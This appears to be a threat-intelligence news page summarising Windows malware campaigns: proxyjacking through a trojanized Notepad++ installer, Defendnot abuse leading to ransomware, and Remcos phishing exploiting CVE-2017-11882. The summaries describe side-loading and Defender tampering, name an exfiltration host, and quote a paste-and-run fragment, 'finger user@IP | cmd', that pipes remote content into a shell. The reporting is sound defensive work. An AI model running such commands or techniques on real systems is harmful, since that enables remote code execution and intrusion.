Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware
Multiple active malware campaigns are using social engineering and trojanized content to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to Larva-25012 that distributes fake installers (notably a trojanized Notepad++ package) via cracked-software sites; the Setup.zip bundle includes a legitimate Setup.exe plus a malicious sideloaded DLL (TextShaping.dll) that decrypts and installs DPLoader for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed proxyware.
Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (GitHub and Dropbox) for payload hosting and weaponizes Defendnot (a Windows Security Center trust-model research tool) to disable Microsoft Defender before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver Remcos RAT, including fileless execution behavior and exploitation of CVE-2017-11882 (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
Timeline
Jan 22, 2026
ASEC warns of Larva-25012 fake Notepad++ installer proxyjacking campaign
AhnLab Security Intelligence Center warned that threat actor Larva-25012 is distributing trojanized Notepad++ installers through fake software download sites aimed at users seeking cracked or pirated software. The malware uses DLL side-loading to install DPLoader, weakens Windows Defender, persists via scheduled tasks, and monetizes victims by installing proxyware such as Infatica and DigitalPulse.
Jan 22, 2026
FortiGuard reports Russia-focused campaign abusing Defendnot and cloud services
FortiGuard Labs disclosed a multi-stage campaign targeting users in Russia that uses business-themed decoy documents, weaponized Defendnot to disable Microsoft Defender, and payload hosting on GitHub and Dropbox. The intrusion deploys Amnesia RAT and later ransomware and WinLocker components for persistent control, credential theft, and data denial.
Jan 21, 2026
Fortinet identifies phishing campaign delivering Remcos via shipping lures
Fortinet analysts reported a phishing campaign using fake shipping emails with malicious Word documents that fetch remote templates and exploit CVE-2017-11882 to install Remcos RAT. The attack uses fileless execution, scheduled-task persistence, and TLS command-and-control to evade detection and maintain access on Windows systems.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Threat Actors
Sources
Related Stories
Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva‑25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
1 months ago
Windows Malware Campaigns Abusing Trusted Tools and Cloud Hosting for Stealthy Execution
Multiple Windows-focused malware campaigns were reported leveraging *trusted distribution and execution paths* rather than exploiting software vulnerabilities. One campaign attributed to **Larva-25012** disguised proxyware as legitimate *Notepad++* installers distributed via fake cracked-software portals and deceptive ads, primarily impacting South Korea. The payloads were hosted on GitHub and delivered as MSI/ZIP packages containing legitimate components plus malicious DLLs, using **DLL side-loading** and process injection into **Windows Explorer** to deploy proxyware (e.g., **Infatica** and **DigitalPulse**) for **proxyjacking**—monetizing victims’ internet bandwidth by reselling access through their networks. A separate multi-stage Windows malware operation used business-themed lures and weaponized archives containing **LNK** shortcuts to run hidden **PowerShell** with execution-policy bypass, pulling an obfuscated loader from GitHub and using legitimate services (e.g., **Dropbox**) to blend into normal traffic. Fortinet-reported tradecraft included persistence, decoy document generation, and beaconing via the **Telegram Bot API**, followed by defense evasion through abuse of **Defendnot** to disable Microsoft Defender before dropping follow-on payloads such as ransomware, banking trojans, and surveillance tooling. Additional reporting highlighted a broader trend of attackers abusing legitimate infrastructure and admin tooling (including **RMM** software after credential theft) to establish persistent access, while generic “common threats” content provided no incident-specific intelligence.
1 months ago
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
1 months ago